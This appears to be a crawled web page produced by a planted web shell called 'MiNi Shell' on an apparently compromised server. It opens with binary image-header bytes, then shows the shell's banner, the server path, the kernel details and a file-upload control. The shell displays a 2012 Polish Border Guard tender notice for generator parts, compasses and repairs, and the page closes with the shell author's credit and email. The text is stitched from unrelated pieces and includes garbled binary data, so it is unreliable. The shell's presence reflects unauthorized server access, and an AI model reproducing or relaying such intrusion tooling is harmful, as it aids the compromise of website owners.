JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/371068-N-2012.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony na dostawy materiałów eksploatacyjnych, kompasów elektronicznych oraz usług przeglądu i remontu 3 agregatów w Przewoźnych Jednostkach Nadzoru (sprawa nr 42/ZP/WŁ/12)</b><br>
<b>Numer ogłoszenia: 371068 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Straży Granicznej im. gen. Henryka Minkiewicza , ul. Bema 100, 15-370 Białystok, woj. podlaskie, tel. 85 71 45 171, faks 85 71 45 715.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaski.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy materiałów eksploatacyjnych, kompasów elektronicznych oraz usług przeglądu i remontu 3 agregatów w Przewoźnych Jednostkach Nadzoru (sprawa nr 42/ZP/WŁ/12).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania w zakresie :
-części I są dostawy do Podlaskiego Oddziału Straży Granicznej części i materiałów eksploatacyjnych do Przewoźnych Jednostek Nadzoru zgodnie  z opisem przedmiotu zamówienia stanowiącym załącznik nr 1a do SIWZ,
-części II są dostawy do Podlaskiego Oddziału Straży Granicznej kompasów elektronicznych do Przewoźnych Jednostek Nadzoru zgodnie  z opisem przedmiotu zamówienia stanowiącym załącznik nr 1b do SIWZ 
-części III jest przegląd i remont 3 agregatów prądotwórczych CAMINO 4 w Przewoźnych Jednostkach Nadzoru zgodnie  z opisem przedmiotu zamówienia stanowiącym załącznik nr 1c do SIWZ,
Dopuszcza się w zakresie części III sprawdzenia stanu technicznego Przewoźnej Jednostki Nadzoru przez Wykonawcę. Weryfikacja może zostać przeprowadzona w lokalizacji wskazanej przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przegląd i remont agregatów prądotwórczych CAMINO 4 w Przewoźnych Jednostkach Nadzoru. Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówienia określonego w części III przedmiotowego postępowania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.73.10.00-9, 50.53.23.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że spełnia w/w warunek. 
Ocena spełniania warunku dokonana zostanie na podstawie przedstawionego przez Wykonawcę oświadczenia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że spełnia w/w warunek. 
Ocena spełniania warunku dokonana zostanie na podstawie przedstawionego przez Wykonawcę oświadczenia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że spełnia w/w warunek. 
Ocena spełniania warunku dokonana zostanie na podstawie przedstawionego przez Wykonawcę oświadczenia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że spełnia w/w warunek. 
Ocena spełniania warunku dokonana zostanie na podstawie przedstawionego przez Wykonawcę oświadczenia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że spełnia w/w warunek. 
Ocena spełniania warunku dokonana zostanie na podstawie przedstawionego przez Wykonawcę oświadczenia. Nie spełnienie warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.podlaski.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podlaski Oddział Straży Granicznej, Sekcja Zamówień Publicznych, ul. Bema 100, 15-370 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2012 godzina 14:00, miejsce: Kancelaria Jawna Wydziału Prezydialnego PoOSG w Białymstoku przy ul. Bema 100, bud. 2 pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa części i materiałów eksploatacyjnych do Przewoźnych Jednostek Nadzoru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz części i materiałów eksploatacyjnych do Przewoźnych Jednostek Nadzoru:
Dysk twardy do komputera w PJN (2,5 cali IDE, min. 80GB) 4 szt. 
Monitor LCD (monitor do zabudowy, 17cali, zasilanie 24V, we/wyj: DVI, BNC, S- Video) 2 szt.
Ładowarka 24V/60A (AC 230V, 50Hz, 8A na DC 24V 60A z zabezpieczeniem
 temperaturowym ładowania akumulatorów żelowych) 2 szt.
Żarówka (28V, 40mA, T5.7x15 ML388) 20 szt.
Jarzeniówka (F8W/T5/135) 10 szt.
Czujnik temperatury: MQT8K (czujnik temperatury przystosowany do pracy na zewnątrz
do układu anty-oblodzeniowego dla spadku temperatury poniżej 7stopni C (powyżej 0 stopni C
rozwiera styki)) 20 szt.
Czujnik temperatury: 2455R-F60C (czujnik temperatury (24V punkt temperaturowy 55 stopni C,
 NO (normalnie rozwarty) z uchwytami montażowymi)) 20 szt.
Gniazdo wtykowe ABL 1154 (230V, 16A, IP44) 4 szt.
Pasek klinowy kompresora klimatyzacji (670 x 11,9)  5 szt.
Wiatrak do układu chłodzenia agregatu (Spal Italy VA13-AP9/C-35A 12V) 3 szt.
Rozrusznik do agregatu Camino 4 (12V 0,8 kW) 1 szt.
Rozrusznik do agregatu Panda 4 -  1 szt.
Panel sterowania do agregatu Camino 4 -  2 szt.
Pompa paliwa (Pierburg 04T0120 7.21440.51.1) 2 szt.
Komplet filtrów do agregatu Panda 4 (oleju, paliwa, powietrza)  6 kpl.
Komplet filtrów do agregatu Camino 4 (oleju, paliwa, powietrza) 30 kpl.
Amortyzator gazowy (Pommier 20.43917F 300N)  6 szt.
Przewód paliwowy (gumowy, zbrojony śr. wewnętrzna 8 mm) 10 mb
Przewód olejowy (śr. wewnętrzna 8 mm) 10 mb
Poduszki amortyzacyjne do agregatu Camino 4 - 5 kpl.
Czujnik temperatury do agregatu (24587-A 105 - 99) 10 szt.
Czujnik ciśnienia oleju do agregatu Camino 4 - 5 szt.
Silikon w sprayu (min. 500 ml) 15 szt.
Olej do konserwacji (min. 150 ml) 15 szt.
Olej do konserwacji i odmrażania zamków w sprayu (min. 50 ml) 15 szt.
Spray do konserwacji biegunów akumulatora (min. 150 ml) 15 szt.
Kontakt spray do czyszczenia styków (min. 300 ml) 15 szt.
Alkohol izopropylowy w sprayu (min. 300 ml) 5 szt.
Smar wysokotemperaturowy CU (min. 300 ml) 15 szt.
Suchy smar teflonowy w sprayu (min. 300 ml) 15 szt.
Smar odporny na wysokie naciski w sprayu (min. 500 ml)	 15 szt.
Pianka czyszcząca w sprayu (min. 500 ml) 15 szt.
Spray do czyszczenia ekranów LCD (min. 200 ml) 15 szt.
Zamrażacz (min. 500 ml)	 5 szt.
Rękawice ochronne mechanika samochodowego (odporne na działanie smarów,
olejów i wysokich temperatur) 15 par
Wszystkie wskazania dotyczące znaków towarowych urządzeń należy rozumieć jako określenia wymaganych parametrów technicznych i standardów jakościowych. Oznacza to, że zgodnie z art. 29 ust.3 ustawy Prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych. Pod pojęciem oferty równoważnej Zamawiający rozumie zaoferowanie produktu 
o parametrach nie gorszych oraz kompatybilnych (współpracujących) ze wskazanymi urządzeniami.

Wykonawca zobowiązuje się do udzielenia co najmniej 12 miesięcznej gwarancji , której bieg rozpoczyna się w dniu następującym po dniu podpisania bez zastrzeżeń  protokołu odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.73.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa kompasów elektronicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompas elektroniczny (TCM 2-PNI Corp.) 3 szt. Wszystkie wskazania dotyczące znaków towarowych urządzeń należy rozumieć jako określenia wymaganych parametrów technicznych i standardów jakościowych. Oznacza to, że zgodnie z art. 29 ust.3 ustawy Prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych. Pod pojęciem oferty równoważnej Zamawiający rozumie zaoferowanie produktu o parametrach nie gorszych oraz kompatybilnych (współpracujących) ze wskazanymi urządzeniami. Wykonawca zobowiązuje się do udzielenia co najmniej 12 miesięcznej gwarancji , której bieg rozpoczyna się w dniu następującym po dniu podpisania bez zastrzeżeń  protokołu odbioru końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.73.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przegląd i remont 3 agregatów prądotwórczych CAMINO 4 w Przewoźnych Jednostkach Nadzoru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	przegląd silnika agregatu:
sprawdzenie i wymiana zużytych elementów cylindra i tłoka agregatu,
sprawdzenie i wymiana zużytych panewek głównych i korbowodowych,
sprawdzenie i wymiana zużytych uszczelniaczy wału korbowego i wałka rozrządu,
sprawdzenie i wymiana zużytych wtryskiwaczy i pompy paliwa oraz elektromagnetycznego zaworu odcinającego paliwo,
sprawdzenie i wymiana zużytych elementów w układzie rozruchowym agregatu,
wymiana zestawu uszczelek agregatu,
sprawdzenie i wymiana zużytych odpowietrzników,
wymiana czujników i wyłączników: temperatury silnika, spalin, ciśnienia oleju,
sprawdzenie i wymiana zużytych elementów koła wieńca, rozrusznika oraz tulejki w bloku,
sprawdzenie i wymiana simeringu pomiędzy prądnicą a wałem,
sprawdzenie i wymiana łożyska wału i tulei,
kontrola pracy dekompresatora,
wymiana przewodów i rurek oraz złączek,
wymiana filtrów (w tym dwa filtry oleju) i płynów,
sprawdzenie i wymiana zużytego regulatora obrotów silnika,
sprawdzenie podciśnienia i przepływu powietrza na wlocie,
sprawdzenie szczelności i uszczelnienie układu chłodzenia i smarowania,
1.	przegląd prądnicy agregatu, w tym sprawdzenie stanu uzwojeń i w razie konieczności przewinięcie,
2.	wymiana instalacji elektrycznej agregatu (agregat prądotwórczy i układ chłodzenia agregatu) w tym: okablowanie elektryczne, izolacja okablowania, złącza, przekaźniki, bezpieczniki, czujniki temperatury i ciśnienia, montaż nowych puszek elektrycznych. Wyniesienie skrzynek bezpieczników wraz z gniazdami poza obręb obudowy agregatu. Wszystkie elementy instalacji elektrycznej muszą być zabezpieczone przed wysoką temperaturą i szkodliwym działaniem płynów eksploatacyjnych agregatu,
3.	sprawdzenie i poprawa mocowania poszczególnych podzespołów (w razie konieczności montaż nowych wsporników i uchwytów),
4.	sprawdzenie stanu technicznego i wymiana uszkodzonych (lub posiadających zły stan techniczny) elementów układu chłodzenia agregatu - chłodnica, pompa chłodzenia, wentylator, złącza, węże gumowe, elementy zasilania elektrycznego (nie wymienione w pkt. 3),
5.	wymiana zużytych elementów gumowych (przewody, rury, złączki, uszczelki) we wszystkich podzespołach agregatu,
6.	wymiana obudowy (kontenera) agregatu na nową. Obudowa i jej elementy muszą być odporne na działanie wysokich temperatur, płynów eksploatacyjnych oraz wibracji powstających w trakcie pracy agregatu. Elementy obudowy (płyty, pokrywy) muszą być demontowalne bez użycia narzędzi w celu dostępu do wszystkich części i podzespołów agregatu podlegających okresowym obsługom, takim jak wymiana filtrów i płynów eksploatacyjnych.
7.	wymiana na nowe elementów układu wydechowego agregatu prądotwórczego (tłumiki, węże i rury połączeniowe, złącza i elementy mocujące),
8.	wymycie i wyczyszczenie wszystkich zewnętrznych elementów agregatu i obudowy oraz układu chłodzenia i układu wydechowego,
9.	wymiana lub naprawa innych elementów / podzespołów (nie wspomnianych powyżej) agregatu i układu chłodzenia, gwarantujące minimum 12 miesięcy bezawaryjnej pracy,
W przypadku stwierdzenia przez Wykonawcę, że stan techniczny poszczególnych podzespołów silnika agregatu jest zły (występuje silne zużycie lub uszkodzenia mechaniczne elementów silnika) dopuszcza się wymianę silnika agregatu na nowy.

Wykonawca zobowiązuje się do udzielenia co najmniej 12 miesięcznej gwarancji , której bieg rozpoczyna się w dniu następującym po dniu podpisania bez zastrzeżeń  protokołu odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com